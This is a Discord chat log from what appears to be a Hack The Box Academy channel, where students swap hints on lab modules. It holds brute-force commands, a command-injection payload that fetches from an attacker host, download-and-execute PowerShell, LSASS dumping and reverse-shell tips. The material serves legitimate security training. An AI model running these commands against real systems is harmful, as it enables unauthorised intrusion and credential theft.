#modules
if its Password Attacks be prepared to spend 30 minutes before finding out you messed up
login brute force one is fairly quick, Id say probably like 10-15 minutes before Id get suspicious
gotcha ok
I think I found an issue with the LINUX PRIVILEGE ESCALATION Privileged Groups. I found the flag pretty quick by recursively grepping for "flag" and judging by the name of the flag (written in l33t) it should be the right one. Only thing is, entering the flag gives me the "incorrect flag" error. I'm pretty sure this is the right flag. I've tried entering it in curly brackets i.e. HTB{flagname} and without, but so far nothing. Has anyone else had this issue too? lol there's two entries. They are slightly different. Make sure you try both of them.^_^
I mean you may have found a flag for a different section and not the question youre on as boxes get reused a lot
uhhh I found the login finally, But now the site seems to not be working, I respawned it and it's still not working interestingly
Nvm, Respawned it a 3rd time now its working
You might want to remove that screenshot @ember valve
gotcha sorry
So when I am running gobuster, it gives me a progress ex. 2402/262000, how do I make it cleaner like the walkthroughs? Figured it out, add -z
anyone have the issue on the Stack-Based Buffer Overflows on Windows x86 module? the target machine will crash (not just the program) if i load a wav file with 4000 byte
amazing how one little letter can throw off your entire script smh
Exactly exactly
This happened earlier to me (not happy)
Just to make sure im doing this right, to get something to download from github is
git clone https://github.com/whatever-file Correct?
Seems right
fatal: repository 'https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt/' not found
I need it for the academy thing, and I can't extract the one Parrot came with for whatever reason
Dear god
Did you try
(Wait, theres more)
Locate rockyou.txt
Okieokie
rockyou.txt.gz, rockyou.txt.gz, rockyou.txt.tar.gz, rockyou.txt.tar.gz
Those are what was found
/usr/share/wordlists/rockyou.txt.gz
Yesyes
But the only issue is, its compressed when I need it uncompressed
Try just txt?
But when I try to uncompress it, it says an error, and when I did that it just gives me errors
Wait, i think I know whats going on
I think im out of storage, I need to just add 100gb to my linux drive
Eh, just added 200gb more cause why not
Now lets see if it works
Okay I am missing something, can I ask virtualbox questions here or is there a chat for that
Did you decompress the file?
That's where I am trying to figure out how to add space to an existing partition but I dont know how to do that in linux without reinstalling
tar -xzf rockyou.txt.tar.gz
Figured the resizing of the drive, but I will try that L3!
Do you know the gz version of that command?
Try gzip -d filename
Thank you so much, that extracted the file
I think it was because I only had 17mb left on the drive and had to repartition my main drive, then do that
How do I decrypt tls_ECDHE_RSA_WITH_AES_128_GCM_SHA256 wireshark, I made my SSLKEYLOGFILE and it has keys, and I setup the file in wireshark, it decrypts http requests but it seems that wireshark has problems with ECDHE
however, fiddler does it perfectly fine, but fiddler is strictly http
Someone knows how to remove copyright output from ffuf?
why
delete it from your wordlist
For footprinting - HARD for the users password do you ||crack his|| ||keys for john? ||
So for Responder very easy, it says in the walkthrough port 21/tcp open is supposed to show up, but it just shows me port 80/tcp open. I've restarted my machine, stopped it and reran it, and neither of those have fixed it, any ideas?
Ah, VPN services are down
nm found the file that I am pretty sure I need but stick on it 😦
ok anyone that can help me with foothold - hard I am officially stuck and I am pretty sure I am doing it right but getting an error that I must be typing something wrong
I can help, if you still need.
Hey all, for the PHP Wrappers in File Inclusion module, the data and input wrapper works fine. But expect does not return any results.
thanks shot you a DM
What have you tried with sa credentials?
Look at all the services on the box?
Hey everyone, I'm on the SMTP footprinting module. On the last question, the hint mentions a footprinting-wordlist. Does anyone know what the hint is referring to?
I can't seem to find that list anywhere
Hey @lethal schooner I don't remember that module entirely, I want to say it's referring to a word-list in seclists thats apt for SMTP attacks or a wordlist mentioned within the lesson. Let me look at that module real quick.
I believe it refers to the wordlists provided in the resources on top right.
@pearl island Oh man, that went right past me. I didn't see that.
What is my job
@lethal schooner you got it? also thanks @pearl island I completely forgot all about that. 😅 I ended up using one of the names wordlists, took me forever to complete that section.
@rustic sage Yeah I get it thanks
phew..ive looked all over this wordpress site and still cant find this flag..must be blind
lol in the next module the answer is there.. I wasted an hour on the wordlist..
Always feels dumb when you complete entire modules but forget to reuse creds and then ask for help
Still feels like you didnt complete it completely alone
Hihihi
Hey I was here earlier asking about the module "Login Brute Forcing" I'm really stuck on the second question under "Skill assessment - Website" . Someone here told me I had a parameter wrong but didn't specify which, So I've been re-reading the module and the man page for hydra, still nothing. I've pick through the burp suite output for the site for anything that can help me but I must be missing something. I've run this command and let it fully run with no password hits. At this point i'd really just like to know what I have wrong so I can learn from it, Just don't know what i'm missing here.
||hydra -l user -P ~/william.txt 157.245.35.145 -s 32046 -V -I http-post-form "/admin_login.php:username=user&password=^PASS^:F=<form name='log-in'"||
^That's the command i was using
I was told to switch it to that since I've already specified the user name I think it is, which in the case of that section hint it should be just user, Should it just be ^USER^?
I did not know about that
Hi, I need help in the module "Attacking common services" in the section "Attacking SQL Databases" I already got the hash, but idk how to crack it, I used hashid to identify the hash but it doesn't work
Maybe remove -l and -V
You mean question 2 of the first skill assessment right
Iv completed that one
It should work with a simple bruteforce command
when i get rid of -l it errors saying it needs the user to be specified, and -V is just to have it be verbose so I can see whats going on in detail
ahh yeah i had that in there to force skip the 10 second wait between running commands since it has the option to restart canceled processes
would that mess things up?
I dont know wouldnt hurt to try
Wait damn
Haha i think its not the command that's wrong
Sorry i have tunnelvision
Maybe try other wordlist
Are we talking about the same skill assessment?
There are two
It is your wordlist i think
Its been a long time man for me that i completed it
First try looking at the parameters
Its probably different than your first parameters
Like username
What are the name parameters of the form?
Is it username or something else?
oh its "user=username&pass=password"
Yeah sorry that i just thought about it now
all good!
wondering if maybe i have to use cupp to make a new wordlist instead of using the bill gates one
dont know who i should make it for
You already got the username
Now follow the theory on academy
Start small wordlist etc
You will get there i think
alright, ill switch it up and try different wordlists
Yey completed hard lab footprinting
gratz!!
guys need help in attacking authentication mechanisms module skills assessment
yea i was going to say, the parameters are different in that one
Hey to anyone who needs help I'm 40% done with CPTS & have completed the entire "skill path" modules except for AD Enum & binary exploitation. i like to help people so if you need a hint just send me a DM and I'll get you on track.
Of course
Thanks mate, solved the issue 🙂
Heya guys. I need some help transferring a file to the host. Using wget
This is in the linux privilege escalation module
What are you trying to do?
I have exploit.txt as shown above
I am trying to transfer it to this shell with the second screenshot
It is in the kernel exploits section on the linux privilege escalation module
I can use wget but I am not sure how
You'll need to host a server locally, so in the folder (screenshot 1) python3 -m http.server (PORT)
Then on the box wget hxxp://tun0ip:port/exploit.txt
Assuming screenshot 1 is your local machine and 2 is your victim.
you know
its annoying that we reuse old accounts from modules far back to perform some attacks
I don't have the credentials anymore
hm says permission denied
Which?
What port are you using?
wley. On AD Trusts - Cross-Forests
The example uses wley, I tried using other accounts and it seems to not be working
I mean @finite gorge
my fault
80
No sorry was mb.
sudo
Try a higher port or run as sudo. Lower ports require permissions.
Remember the process because you'll use it allllll the time.
Sure thing
Hi. I was doing the footprinting lab medium and am stuck at the mssql :/
Any help is appreciated
@teal birch how are u stuck
so i got the username and password ||alex:lol123!mD||
and logged in to rdp
but i can't find the password for the sa
and idk what the other user is
@teal birch enumerate smb again
thanks for the help. i finally did it:)
Ok
Hello everyone, how can I force my laptop to run on direct power and only use the battery when unplugged?
you can remove the battery if it is possible
hey ik this isnt the chat for this but can anyone help me get a instagram acc back
@stuck ravine what is the problem
my friends instagram acount got hacked just wanted to know if anyone can help
@stuck ravine hard to find someone who can help u
Someone has finished the Attacking Active Directory Skills Assessment part I ? I need help please
I am stuck at Service Authentication Brute Forcing
only 10 min left for target machine and I barely check 4000 or so passwords
I stop using -t 4 because it was sooo slow
hydra -l b.gates -P william.txt -u -f ssh://138.68.159.33:31979 -V
this is the command I am using
any help to decrease number of passes maybe 
there are 13k passwords right now 
should I put back -t 4 again because some of them failing 
well here we go
ncrack -v -T 5 -u b.gates -P william.txt ssh://178.128.44.103:31957
with ncrack -T 5 . I ve found it within a minute
crazy
Anyone for the Skills Assessment of Using Web Proxies?
I'm stuck on the third question
What is the third question again?
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
You need to generate a wordlist of all the potential md5 hashes, so the 31 characters + a-z,0-9.
Then send the wordlist via intruder in burpsuite with the correct encodings (I believe base64 encode then hex encode)
hi guys! Need help on WordPress - Discovery & Enumeration
Enumerate the host and find a flag.txt flag in an accessible directory.
Already tried every plugin and theme directory, wp-includes and still nothing. Any tips?
Edit: Found it. The answer is in the source code don't leave no stone unturned enumerate literally everything, wp-scan won't help you on this one.
Yes and I also add the incomplete md5 hash as prefix
So I think I wrong to set the positions
I've tried with cookie=§3dac93b8cd250aa8c1a36fffc79a17a§§P§ but I don't know if it's right
That looks correct, just make sure the payload it’s sending is correct
Somebody can help me with skill assessment :website from login brute forcing.? I don’t know which wordlist I have to use …
Hey everybody I am pretty new in here any advice where to start learn
It's correct I decrypted every cookie I send and it actually did all the tests but it keeps giving me 200 as an answer
Look at the content length
Just saw that the flag appear on the page and I didn't notice it
Thanks for the help
Good afternoon, I'm in the Linux privilege escalation module
There is a part that I need to use an nc but it is returning "permission denied", can anyone give me a light on what to do?
Hello I try to dump Lsass in SeDebugPrivilege Windows Priv Esc but i have this error any idea ?
Anyone got a sec to help with the ad assessment part 2?
You need to use privilege::debug
Feel free to dm
Have you run cmd as administrator?
I think you can get that error if you don't have privs to do it.
I just solve it i'm dumb i don't see i don't set the dump in the same folder
Hi, Can someone help me
htb-student@NIX02:~$ nc -lnvp 443
nc: Permission denied
sudo
Port 443 requires sudo privileges. Go higher if you don't want to sudo.
Thank you!
Anyone able to help with the mount in the NTFS vs. Share Permissions lesson? I'm trying to do the mount but I'm getting a "mount: bad usage" error, I went back and installed CIFS Utilities but am still having the same issue
Do mounts not work in the PwnBox? I cannot figure out what I'm doing wrong when I try to mount to a shared folder
bad usage usually means your syntax is bad
Also check firewall on the windows host
I figured out the syntax issue, now I'm getting a message saying the "mount point does not exist"
sounds like the mount point doesnt exist
Ok so I'm following the instructions in the lesson, what am I missing?
which module and section?
Windows Fundamentals, NTFS vs. Share Permissions
I've created the folder, changed the share permission for everyone to full control, and then go to mount to the share and type it in exactly the way it says and get "mount point does not exist"
How do I check the firewall?
Anyone else having hitting their docker machines?
Im trying to do sqlmap and I cant hit the site at all atm
annnnd now its working
ah sorry, not a module Ive gotten or intend to get so I cant verify it. Best of luck.
Hi how am I supposed to login to smtp for the attacking common services? I believe I found the user and pass but I always get authentication failed
Who says those credentials have to be used for SMTP?
I just assumed they would work because I used hydra to get the credentials
If hydra can login shouldn’t I also be able to?
One way you could do it is with your RDP session open the search bar in the bottom left corner of windows and search "Windows defender" and see if the firewall is on .
Password attacks - Network services - 1st question
I am using this command
crackmapexec winrm 10.129.115.165 -u username.list -p password.list
and getting this error
WINSRV\aspnet: "SpnegoError (16): Operation not supported or available, Context: Retrieving NTLM store without NTLM_USER_FILE set to a filepath"
thats an odd error to get
are you using the pwnbox version?
also may be worth trying the --local-auth option
hi guys
Is anybody else having trouble spawning the target systems?
i wanted to know if it's a good idea to start with javascript
also is it possible to hack server sided things ?
i just spawned one fine
now it is working
I recommend python if you aren't too interested in getting into an abstraction of the processor and just want to write useful code. If you are, then C, but it's, complex, python is a little easier to digest if you aren't dedicated or already used to coding.
Boxes are getting easier and easier because of academy
thank you
there is a game that i want to try to "hack" into its server sided things
But the game is built with javascript
I dont wanna destroy it ofc
just curiosity
Learn js
sketch
Cause many told me you cannot hack server sided things
i need like one year or more xdd
im like a super mega beginner
I dont even know all computer science basics ;-;

Then start with js
is there a youtube playlist with ordered stuff to learn in ?
How did you learn ?
I cant find smthing ordered
html useless no?
lol
And python for simplicity
yeah
how did you learn from start
I need something
Like a plan
I cant just go randomly
hey
i want to show you the game
Mb just discover it a bit and tells if something is possible
oh wow
Where did you learn it tho
Html you wil learn in a week
and js?
Youtube, codecademy
Depends:p
ok check a browser game called :
slay.one
im sure you will like it
you can also read a lot of its code easily
but i just wanna if its possible to hack server sided things
for example : being immortal in it
Some ppl told me its IMPOSSIBLE to hack server sided things in it
But im sure thats false
I am still getting the same error
I am using VM - version 5.4.0
hmm not sure what the pwnbox version is but thats probably the issue
hmm let me try with an instance
Hmm Im pretty sure I got the flag for the sqlmap assessment but its not taking it. Can someone verify I have the right flag and im not going nuts?
pwnbox version is 5.2.3 so maybe cme broke something in a newer update
sure hit me with it
Thats a pretty new module so not many folks yet
I was just trying to dual Boot parrot (htb version) and Windows. (Not for hacking/htb purposes - just for getting familiar with it)
Anyone knows what reasons can exist that parrot is Stuck in shutdown process after i hit shutdown? Its like an endless loop
Some one help me in Bash scripting?
I need code like
if folder B in folder A matches with the folder D in folder C then move Folder B to Folder D
I mean if name of folder matches move it
Hey I am sorry could I message you please
Hello can I message you please
Hey Reapingyou sorry please message me
Hello trying to reach Reapingyou please let me message you sorry would you please contact.
Dont spam
I am not spam
you literally are
No I am not
channel is for discussing modules, not you repeatedly trying to message one person
send your request to dm once and then move on, more times is just spam
ok
I DM you
no thanks
Bro shut up lol
ok
hi all, I'm doing Footprinting lab Medium and I am stuck at SQL Management Studio. I found the file in Alex's folder which has the cred <user>:<password> . I used those cred in the studio and got an error
A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (.Net SqlClient Data Provider)
reading through some of the interaction in the past, some ppl suggested to use "Administrator" instead of "sa" . That did not work too
Without any clue of the module: I checked for the error message and found a mentioning of an issue due to the selected authentication mode. Maybe you can check that out.
Actually , i was accessing the RDP with a different cred. Finally solved ! Thanks for responding anyways :))
Reapingyou
🥳
SilverKnight if you are trying to get help with a module, you can try posting what module/section/question you're having trouble with. If you want to provide details on what you've already found or tried, then hide that part behind a spoiler.
I was trying to get in touch with someone I used to message but since having a falling out guess not people today are incapable of working out indifference and are too soft
bro this channel is for module discussion not your personal grievances, shut up
ok make me
@novel matrix hey mod this guy keeps spamming the modules channel with his personal grievances with some other user who's not even here.
yooo
look like I said I tried to ask for help you run me around is this what I paid for
can we please make sure we stay on topic with the channel description. 
I'm guessing you tried reaching out to one of the employees?
bruh Ive paid too, most of the other people have paid too, were not your freaking slaves were also students
ok
Dm me what the issue is with the module
Module challenges fail to stay up and target dies 5 seconds after starting the challenge. HOW TO FIx?
):
Might be specific to the module. I've been fine for the past 15 mins. Are you using OVPN?
Challenge doesn't need to be connected with OVPN
What module?
file upload vulns
can't tell if F5 the page breaks the box
Felts like I refreshed the page before and the target was still up...
now I have incomplete data ):
I had some issues refreshing previously with their antak webshell yesterday. Seems somewhat hit and miss.
):
Can someone help me on skill assessment (second question) of the Login Brute Forcing module. I used the below script but cannot find the answer.
hydra -l user -P /usr/share/wordlists/rockyou.txt -f <TARGETIP> -s <TARGETPORT> http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name ='log-in'"
nvm, just did it.
Hydra is a syntax nightmare. Xhydra helps a lot, in case you have to use it again.
thank you
Does anyone know if the AD tools folder is available for download
I know they give us the list under resources but I figured there might a download somewhere
Does anyone know how to get WinRM, is it on github?
does anyone know of a convenient way/tool to create a valid user's list using AD user enumeration?
i get that you can get valid users w/ like kerbrute but it would be mighty convenient if I could get them in a list for password spraying
Im just now on starting point box three, and I am just now having issues LOL
But I was getting a proxy error after adding it to /etc/hosts , now it says that it cant establish a connection to the server rip
So im just waiting for it to respond
Yeah, its still not coming up, something broke
Not actually. You can write most commands in a user-friendly syntax, for example:
hydra -l USERNAME -P /usr/share/wordlists/rockyou.txt "http-post-form://IP:PORT/login.php:username=^USER^&password=^PASS^:F=login" -t 64
Hey Pedant, you know how to fix courses per chance lmao
Which module?
I think I done messed up but I've followed it to a tee, and its Three under very easy
!!
the s3.thetoppers.htb
Are you doing Academy or the main platform?
Academy, is this not the right chat?
It is, which module?
Is this it? https://github.com/theyoge/AD-Pentesting-Tools
Tier 1, Machine named Three after responder
Where did you find this??
Googled AD Pentesting Tools in google, then found the github link
wtf
This is not the Academy (https://academy.hackthebox.com/). You need to go to #starting-point
Oh!
Thanks @worthy jasper , gl with what your working with
Thank you LOL, I've been asking here and I've gotten help in here for this as well, I think I somehow got to this when I was in Academy
That explains why it jumps from easy to difficult in my brain, thank you Pedant :D
And no problem jramos
NP Good luck
But if you do know how to fix it, could you answer me there? :D
It is not the place for it.
Anybody completed the Linux Privilege Escalation module?
Imma bit stuck on the Special permissions section.
Just need some guidance on how to do it.
What are you struggling with? @finite gorge
Is there any issues going on with the modules tonight? I am trying to ping the IP of my machine and it isn't giving me any feedback and times out in terminal
Where I am: Interactive Section with Target // My instance isn't even working either which may be an issue
I'm on a box RN with no issues.
Weird
Has the box timed out? They will die in the background without really telling you. Refresh page and see?
Im on Academy-Regular VPN, and yes I refreshed the page and even my vpn, just disconnected and reconnected
Can you see if you can ping ||157.245.41.35||?
Which module are you doing
are you connecting to the right port? they generally wont accept pings
Yep, one moment
Oh, that's a docker box. You don't even need VPN.
You can just visit ip:port in browser.
Well I am stupid then LOL, lets see if that works
What is the proof text displayed in the Target website you browsed?
Thats what it was
http://157.245.41.35:32763
Well now to do fundamentals to linux to learn how to operate linux better
It is now on the Linux Privilege Escalation module on the section of Special Permissions
In 'Documentation & Reporting Practice Lab' in the notes left by the tester and precisely in 'H5 - Local Admin Password Reuse' there are the credentials of the administrator. Where did they come from? On which host were they found?
Thank you!
Please i need help with skills assessment 2 of nosql injections attacks
Which question?
Has anyone finished the broken auth module?
Dat colour scheme!
Both of them on the screenshot you can see
I need help with either one of them
Finding SUID you'd do find . -perm /4000 and sgid /2000
@finite gorge well @candid zephyr covered the commands but do you understand what SUID and SGID are used for practically? Why would someone want to have those bits enabled and which scenarios this is insecure?
does the module not teach you that?
I don't know I never done HTB academy
oh. why are you in the htb academy modules chat lol
answer the questions sometimes
a lot of the questions seem specific some of the stupid shit you come across in the modules haha.
yeah that's why I only answer sometimes 😄
i haven't done many just the windows privesc and ad attacks one. they're well written. i tried the binex one but it's all a bit outdated feeling.
i would do some if the pricing was better
Yeah cubes feels scammy af
micro transactions feels
i bought the windows and ad one off a single 1 month sub which feels good
I liked windows privesc. I think there has been an update since I last worked on it though so I could go back. AD is on my list, I just haven't gotten to it yet.
Thought it was really well written and useful. The same author did the AD one, so I'd do more of his I suppose.
Hi guys, stuck at Windows Privilege Escalation Skills Assessment Part I, at the foothold. I feel like I'm doing the right thing but it's not working
Edit: solved.
Hint: ||not all commands work from the webapp, even if they work on the machine||
The skills assessment?
Yes
You get given the creds to log into RDP
There's none? We're supposed to exploit a command inject on the webapp
How well do you know command line stuff?
Can you see it will ping your box if you give it an IP?
Student discount go burrr
What if you wanted it to run two commands...
I did that module yesterday. Semi colon is blocked afaik
I mean specifically that micro transaction style of removing the value away from currency. EUR > Cubes means you forget what they are worth suddenly.
Yeah. What else would you do?
But just go to payloadsallthethings. Plenty of payloads to try
If you wanted to execute a command only when the first one completes.
Fair. I don't even think about cubes. I get everything for $8 a month
I mean, I figured that. It's just that my second command seems to not be running. I try ||127.0.0.1 & powershell -c 'curl http://10.10.15.28:8000/'|| but it doesn't get executed at all
Or other variations of that, like iwr -uri
&&
Same
Nah I just wanted to try simple stuff first
I did it differently
Try some of the payloads here
There are more than a few that work
nishang is the simple way imo haha
they gave you the command and script in an earlier section
Nevermind I just got a shell
Still curl, wget and iwr don't get executed, but spamming shells finally does work
Well, it's a windows machine. There's no guarantee Curl or wget are installed
If you wanna download something, always go for certutil first on a windows machine
It'll work 99% of the time
Forgot about that, but iwr didn't work for a quick request
Nishang is covered in the Vulnerable Services section btw
Well now that you're on the machine Try to figure out why lol
Barely. They gloss over invoke tcp for like 3 and a half seconds
I think it's the only section that actively gives you a command that'll execute a reverse shell outside of metasploit and nc.exe lol
Fair
Maybe it's because I used the course as a refresher so used nishang a lot before that it stuck out to me.
I usually just use nc lol
It does work on the machine, curl, iwr both work with powershell and powershell -c. I guess the web app is weird
Hmm yea. Maybe see if you can find the source code for the web app after you privesc. Could be something blocking it there
Who knows 🤷♂️
it works with iex (new-object net.webclient)
I think question 2 in that assessment is a prime example of weird academy module shit haha
Ehh. Idk, it's just credential hunting which is something you should be doing anyway
They say in the prompt that there is no AV on the machine so I just uploaded lazagne after I got system
That's the point tho. You need system first. So it shouldn't be "Enumerate Hotfixes" "Find this File"
It'll make people think they're doing it wrong.
It was a good module nonetheless. Just being picky. :-p
Fair
Idk
I don't usually pay attention to the questions
Based on the module i know what I'm supposed to do. So I do it, and then afterwards I go back to answer questions
I did the same thing on the Linux privesc
Get root first, answer questions later
Nothing announced to my knowledge. Only sale I'm aware of is on ProLabs. #📣-announcements message
Hello
I need help with last part of Footprinting Lab - Hard, if someone can DM me
Im sitting down to do those now. Will let you know when I finish it
sure shoot me a dm if you still need help with that
Trying to use ||Inveigh|| to get creds for ||CT059|| on the pwnbox, but neither the .ps1 nor .exe are on it. Sanity check: should I pull it from GitHub, compile it and transfer from my Kali -> Jump -> Target? Or am I over-engineering this likely disaster?
This is for assessment part 2, AD enum/attacks btw.
Hmm I tried it but didn't seem to work for the answer
I tried putting that into the answer but it didn't seem to work
So the . means using your current directory.
So if you're in /home/htb-student/ searching . as the directory starts there
so the full path is actually /home/htb-student/shared_obj_hijack/payroll
I see
If you change the command to find / -perm you'll start the search from /
It's just the directory to search in. find /home -perm /4000 will search in home dir and so on and so forth.
do find / -perm /4000 2>/dev/null Sry fix my syntax x)
presumably it'll give you the full path of any binaries with suid set. I'm guessing it wants the entire path as the answer
Change . to /
a lot of them are default
a lot of the /usr/bin ones you can ignore. are there any that stand out as being like /opt or /home
I presume for the sake of this question anyway.
Also if you want to know why you'd look for SUID binaries, websites like https://gtfobins.github.io/#+suid have default exploits
@candid zephyr shared object hijack sounds juicy to me 😄
I tried looking at them one at a time. Still didn't get the right answer. Not sure if I am making a mistake by putting the answer
I think one that stands out was /usr/bin/at
@candid zephyr Did you solve this section before?
Hello i'm in the Domain Admins Group but i can't access to admin Folder or the flag in DnsAdmins > Windows Privilege Escalation any idea ?
Try to run cmd as admin?
can someone validate my commands for the information gathering - web edition. ||I am running FFUF, Gobuster, and WFUZZ||. Running the same command I have used with other boxes with no issues also. I am using namelist.txt as it mentions in the module.
Didn't work
Are you in the DC or a client machine?
try that or make a shell and make the dll file run that shell like i did
Which wordlist I have to use with the brute force module assessment website
sure shoot me a dm with your command and which section you are on
this is a bit too much spoiler so shoot me a dm i'll give you a little hint
for the second question use ||rockyou||
Thanks it works !
ty for trying to help me ❤️
Hi, I'm stuck at the Php wrappers module.. If someone could help me, give me a hint, I would much appreciate it. I have gained RCE through PHP Input Wrapper... the flag should be at / , yet http://IP:PORT/...&cmd=id i do get uid=33(www-data)... cmd=cd / && ls. does not work... cmd=cd / cat flag.txt also does not work.... Do not know how the hell can I travel to the right directory to cat the flag...
looks like php wrappers is a section name because there is no module with that name, but for your issue try ls / or if the flag is named flag.txt you can just cat it: cat /flag.txt, no need for cd
and if you are in a RCE shell you can't use cd either
These do not work. Module 23 section 253
the file inclusion module?
Yes
yep for this the flag isn't named flag so do a ls / first
hello
hi 
Ls gave only en.php, es.php, extension php, image.php, index.php and style css...
then you are missing the /
Yeah now gave it a 378...txt but cannot read it... Ls / && cat 378.....txt does not work...
but why do you also need the ls command for when using the cat command?
Need someone to verify an answer to the 4th question in Intro to Network Traffic Analysis > tcpdump fundamentals. I am helping someone and the answer that I used and was marked correct does not work for him.
Thanks I found it.. OMG...
Anyone having problems connecting to Academy VPN?
no, Just connected about 30 minutes ago
sure shoot me a dm with the answer you need to verify also did the person you help try a refresh or even a hard refresh
if that person did but still nothing this isn't the first case
really? been connected for a few hours now having connection failed. Gonna reboot everything and change vpn files, hope it does the trick
dumb question but is your pwnbox on?
Can someone confirm that Web Service and API Attack Module >> Section file upload always break the page and if it loads i can not click the target spawn button.
if i refresh page does not load
Has anyone completed the Information Gathering - Web Edition VHOST using a VPN and not the PWNBOX. I get the flags in the pwnbox but can not get the flags using a VPN and my /etc/hosts file is fine and I can ping inlanefreight.htb
I have completed it a month ago or so and had no issues
With VPN
would you mind running ||gobuster ||on it again and see what you output. I can get the flag with the pwnbox but nothing on VPN. I am curious if its the box
Let me get to my machine and I dm you if that’s ok
sweet thanks
Hey sorry no, I haven't done the linux privesc. It's a pretty fundamental question so I assume it intends you to answer one of those first /home options. The question implies it's already shown you one of the SUID binaries in the text above it.
Hi, I'm in the footprinting module in the IMAP/POP3 and I can't find the last flag (I searched in the server and only found 1 mail). Any hint?
here give this a try from the top down https://donsutherland.org/crib/imap
here you have another resource just in case: https://www.atmail.com/blog/imap-commands/
Hello everyone, I am stuck again hahaha
Module
Password Attacks
Password Reuse / Default Passwords
Question
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
I used sam's pass from the previous section and connected to target via ssh.
There were two other users.
I used every possible option that came to my mind
1st
used this list
DefaultCreds-Cheat-Sheet
2nd
get only password from that list and use usernames I found on the target
++++ I used ftp to bruteforce as it was open
++++ ssh server doesnt have ncrack or hydra installed and sam doesnt have any priv
What should I do now?? Any ideas??
Sorry I can't help you there Rexkmes, I havent even gotten to this part yet LOL
hint ||answer is in one of the links|| and you ||got the right one|| so you may want to remove it due to spoiler
I was going to ask a question, but I figured it out. I tried doing ||find / -type f -name .log 2>/dev/null | wc -l||, but I forgot to add the * before the ||.log||
Remember that the section name is Password Reuse / Default Passwords
You can pass this section without using any list
I hope this doesn't get flagged for too much of a hint, but for Gobuster and enumerating VHOST ensure that you use the --append-domain flag or it will not find the vhosts depending on the version of Gobuster you are using. Specifically I found this out in the Information Gathering - Web Edition VHOST module. I couldn't get anything to work with the exception of FFUF and on the pwnbox. I noticed the pwnbox used an older version of Gobuster and the new version sets append-domain as false for default.
delete the link you mean??
yep
the link is the provided one from the section I think its fine lol
Ok, I found the answer. After trying them one by one, manually. The weird thing is username and password not working on the target machine. sam@nix01:~$ mysql -u --username-- -p --password-- -h 127.0.0.1
Thank u, finally got it 
that is the command I am using while in ssh server, with the right creds of course
Hello I am seeking guidance for the module: Footprinting - Medium Lab. I have found a user through RPC, which allows me to use RDP but I don't seem to have the credentials to enumerate the MSSQL service. Where do I go from here?
I have the same doubt, did u get it?
I have tried enumerating almost every other service on the host.
Message me if you want a specific hint if not I can say keep looking around you will find something, but it’s simpler then you probably think
Sounds good I will message you now.
On the AD Skills assessment 1 I was wondering what sections would be useful to read to get the flag. There is just a lot of new information to digest and filter for a newbie.
Did you take good notes from the sections?
I usually take notes after I complete the modules
Maybe I should take a break from the skills assessment and get some good notes
While I haven't done the ad module yet, from the ones I have done, they're usually structured in a good order for what to look for. So yea it's a ton of info to digest and a lot to look for but just go in the order the module did and you should be fine
But yea, I'd make sure you have good notes on every section of each module
Oh yeah, even my bad note taking ass takes notes for each module section. I constantly refer to them during the skill assessments
There are a ton of very useful commands and tools in all of them
Also make sure to actually save every link. They're all very very VERY useful
Its also proven that the act of taking notes even if you dont look at them ever again reinforces memory and the concepts taught.
Yea. Which is especially important considering HTB Academy is very heavy on reading
like just a snippet of my notes so far lol
I need to learn how to use obsidian
I do a little bit of reorganizing where I feel appropriately
I use notion
I use emacs 💀
I dont like notion because its cloud sync and not encrypted. I want to be able to make sure my notes are secure if I put anything confidential in there
Fair
I'm a student in college so I'm moving around a lot
Much easier to have my notes in the cloud for now
I actually have to pay if I want to auto sync my obsidian notes, and even then they use end to end encryption for it
Yea
Yeah no fault there, I just want to 'future proof' my note taking methodology
Fair. I'll start using obsidian eventually tho. You can export notion to markdown files so I'll be able to just export my notes and turn them into an obsidian vault
yup
obsidian notes are also just folders and .md files, so you can also setup your own syncing system if youre so inclined.
hi guys! Im at the attacking common applications module in the PRTG Network Monitor section
Im trying to get a reverse shell on the parameter field of a notification but for some reason the powershell payload doesn't work, tried with all variations of powershell from revshells. Any tips?
did you confirm you got RCE with a ping command or something like that? also to run the thing you need to click the bell icon on the right that have "Send test notification"
Yeah i got RCE because reproducing the example from the module( Adding the prtgadm1 user) works. I've been having trouble getting a rev shell really
if you get smb pwned with cme then just use psexec as your valid user.
the only note i got on getting a rev shell for this is in metasploit and powershell rev shell don't usually work for me for some reason
getting a reverse shell is sorta of the challenge of that section
haven't done that section yet but the exploit path might not handle stacked queries well, that's often needed for good rev shells
a shell is a shell
Yeah, i've seen the one with metasploit, was hoping to manage to exploit it manually
maybe try with metasploit web delivery?
is the service running as system or an admin? presuming yes if can add a user
in which case you can make your added user an admin as well and psexec as that user
you can also try a powershell rev shell script saved to a file, run your exploit once with a cmd to pull your script down, and then a second time trying to execute the script alone, sometimes that gets around some no stacked queries limitations
if you're super insistent that it HAS to be a rev shell
So metasploit works
yup, its what metasploit does best
just give it a try and the manually way + web delivery work
also one more thing i just give it a try with hoaxshell and this tool is for bypassing av while getting a rev shell, the only issue i have with powershell rev shell is most of them don't work for me for some dumb reason but this seem to be working fine (no surprise with full RCE)
hoaxshell is nice, only issue is it works in a very weird and obvious manner so it has a pretty significant shelf life before its going to be outdated
Getting Started/Public Exploits.
I can't for the life of me get this to work.
Anyone care to help on the Vulnerability Assessment module?
Confused on how to authenticate to the host and view the web interface needed to see the scan data.
youre trying to read the flag stored within the web dir, but its stated to be located in the rootdir hence just /flag.txt
also not sure thats actually the right exploit but my memory can be faulty as its been awhile.
so the exploit should be reading the flag off the host?
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/
I think its the right module
the one you posted appears to do so
let me try it with path /flag.txt
Thanks! that did the trick.
Time to Pwn some boxes
Vulnerability Assessment: Figured out again how to access the scans. Use a browser to connect to the host. Should be https://(IP):8834
Can I get help for a machine?
if its module related sure can ask your question just specify which module and section its on. Otherwise check out #boxes
how do I get access to it?
Anyone free to discuss AD Enum/Attack Assessment (Part 2)? 99% there, just looking for a sanity check.
for sure man ask away
lmao you named the ss sussy_metasploit
yeah... don't look at any of my screenshot name 🤣
hey has anyone done the shells and payloads live engagement?
